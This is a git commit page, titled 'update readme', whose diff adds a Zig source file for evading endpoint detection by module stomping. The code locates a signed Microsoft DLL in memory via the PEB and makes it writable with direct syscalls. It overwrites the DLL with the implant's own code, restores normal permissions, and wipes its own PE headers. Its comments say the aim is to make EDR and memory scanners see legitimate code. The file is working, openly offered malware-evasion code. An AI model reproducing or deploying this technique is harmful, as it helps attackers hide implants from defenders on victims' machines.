update readme
This commit is contained in:
@@ -0,0 +1,131 @@
|
||||
// 5. Module stomping — copies our .text into a signed MS DLL so EDR sees legit code.
|
||||
// Reference: https://dtsec.us/2023-11-04-ModuleStompin/
|
||||
// 1. Walk PEB InMemoryOrderModuleList, match CryptoAPI/dwrite/msvcp_win (case-insensitive).
|
||||
// 2. Parse our PE headers to locate .text VirtualAddress + VirtualSize.
|
||||
// 3. NtProtectVirtualMemory(target, RWX) — make target DLL writable.
|
||||
// 4. memcpy — copy our .text bytes into target's image range.
|
||||
// 5. NtProtectVirtualMemory(target, RX) — restore so memory scanners see normal permissions.
|
||||
// 6. Zero our DOS header + NT headers — can't find what you can't parse.
|
||||
// our_base comes from Go's reflective loader, not PEB — we mapped ourselves.
|
||||
const std = @import("std");
|
||||
const win = @import("win32.zig");
|
||||
const resolve = @import("resolve.zig");
|
||||
const syscall = @import("syscall.zig");
|
||||
const pe = @import("pe.zig");
|
||||
|
||||
pub var g_evasion_relocated: bool = false;
|
||||
|
||||
// Core stomp flow: copies our .text into a target signed Microsoft DLL, then wipes our headers.
|
||||
// our_base is the DLL base passed from the Go reflective loader (not PEB-discoverable).
|
||||
// Targets are chosen from a shortlist of signed Microsoft DLLs that are always loaded in most processes.
|
||||
pub fn stomp_module(our_base: ?*anyopaque) ?*anyopaque {
|
||||
const targets = [_][]const u8{ "CryptoAPI.dll", "dwrite.dll", "msvcp_win.dll" };
|
||||
|
||||
if (our_base == null) return null;
|
||||
|
||||
// Walk PEB to find a suitable signed Microsoft DLL target
|
||||
const peb = resolve.get_peb();
|
||||
const ldr = peb.Ldr;
|
||||
const head = @as(*resolve.LIST_ENTRY, @ptrCast(&ldr.InMemoryOrderModuleList));
|
||||
|
||||
var target_base: ?*anyopaque = null;
|
||||
var target_size: usize = 0;
|
||||
|
||||
var entry = head.Flink;
|
||||
while (entry != head) : (entry = entry.Flink) {
|
||||
const le: *resolve.LDR_DATA_TABLE_ENTRY = @ptrCast(@alignCast(@as(*anyopaque, @ptrFromInt(@intFromPtr(entry) - @offsetOf(resolve.LDR_DATA_TABLE_ENTRY, "InMemoryOrderLinks")))));
|
||||
|
||||
if (@intFromPtr(le.DllBase) == 0 or le.BaseDllName.Length == 0) continue;
|
||||
|
||||
// Match against our target shortlist (CryptoAPI, dwrite, msvcp_win)
|
||||
if (target_base == null) {
|
||||
const buf = le.BaseDllName.Buffer;
|
||||
const len = le.BaseDllName.Length / 2;
|
||||
for (targets) |target| {
|
||||
if (target.len == len) {
|
||||
var matches = true;
|
||||
var ci: usize = 0;
|
||||
while (ci < len) : (ci += 1) {
|
||||
var c1 = buf[ci];
|
||||
var c2 = target[ci];
|
||||
if (c1 >= 'A' and c1 <= 'Z') c1 += 32;
|
||||
if (c2 >= 'A' and c2 <= 'Z') c2 += 32;
|
||||
if (c1 != c2) { matches = false; break; }
|
||||
}
|
||||
if (matches) {
|
||||
target_base = le.DllBase;
|
||||
target_size = le.SizeOfImage;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (target_base != null) break;
|
||||
}
|
||||
|
||||
if (target_base == null) return null;
|
||||
|
||||
// Parse our own PE to locate the .text section
|
||||
const own_bytes = @as([*]u8, @ptrCast(our_base.?));
|
||||
const dos = @as(*const pe.IMAGE_DOS_HEADER, @ptrCast(@alignCast(own_bytes)));
|
||||
if (dos.e_magic != 0x5A4D) return null;
|
||||
|
||||
const nt = @as(*const pe.IMAGE_NT_HEADERS64, @ptrCast(@alignCast(own_bytes + @as(usize, @intCast(dos.e_lfanew)))));
|
||||
if (nt.Signature != 0x00004550) return null;
|
||||
|
||||
const section_off = @as(usize, @intCast(dos.e_lfanew)) + @sizeOf(pe.IMAGE_NT_HEADERS64);
|
||||
const sections = @as([*]const pe.IMAGE_SECTION_HEADER, @ptrCast(@alignCast(own_bytes + section_off)));
|
||||
|
||||
// Scan section table for .text
|
||||
var text_start: ?*anyopaque = null;
|
||||
var text_size: usize = 0;
|
||||
for (0..nt.FileHeader.NumberOfSections) |i| {
|
||||
if (sections[i].Name[0] == '.' and sections[i].Name[1] == 't' and sections[i].Name[2] == 'e' and sections[i].Name[3] == 'x' and sections[i].Name[4] == 't') {
|
||||
text_start = @as(*anyopaque, @ptrCast(own_bytes + sections[i].VirtualAddress));
|
||||
text_size = sections[i].VirtualSize;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (text_start == null or text_size == 0) return null;
|
||||
|
||||
// Step 1: Make target memory RWX so we can write into it
|
||||
var target_mut: ?*anyopaque = target_base;
|
||||
var region_size: win.SIZE_T = target_size;
|
||||
var old_prot: win.ULONG = 0;
|
||||
const st = syscall.nt_protect_virtual_memory(
|
||||
syscall.nt_current_process(),
|
||||
&target_mut,
|
||||
®ion_size,
|
||||
win.PAGE_EXECUTE_READWRITE,
|
||||
&old_prot,
|
||||
);
|
||||
if (!win.NT_SUCCESS(st)) return null;
|
||||
|
||||
// Step 2: Copy our .text into the target DLL's memory range
|
||||
const dest = @as([*]u8, @ptrCast(target_mut orelse target_base.?));
|
||||
const src = @as([*]const u8, @ptrCast(text_start.?));
|
||||
@memcpy(dest[0..text_size], src[0..text_size]);
|
||||
|
||||
// Step 3: Restore target to RX so it looks normal to memory scanners
|
||||
var restore_mut: ?*anyopaque = target_mut orelse target_base.?;
|
||||
var restore_size: win.SIZE_T = target_size;
|
||||
var new_old: win.ULONG = 0;
|
||||
_ = syscall.nt_protect_virtual_memory(
|
||||
syscall.nt_current_process(),
|
||||
&restore_mut,
|
||||
&restore_size,
|
||||
win.PAGE_EXECUTE_READ,
|
||||
&new_old,
|
||||
);
|
||||
|
||||
// Step 4: Zero out our original headers so scanners can't find a rogue DLL header
|
||||
const old_bytes = @as([*]u8, @ptrCast(our_base.?));
|
||||
const e_lfanew = dos.e_lfanew;
|
||||
@memset(old_bytes[0..64], 0);
|
||||
@memset(old_bytes[@as(usize, @intCast(e_lfanew)) .. @as(usize, @intCast(e_lfanew)) + @sizeOf(pe.IMAGE_NT_HEADERS64)], 0);
|
||||
|
||||
g_evasion_relocated = true;
|
||||
return our_base;
|
||||
}
|
||||
Reference in New Issue
Block a user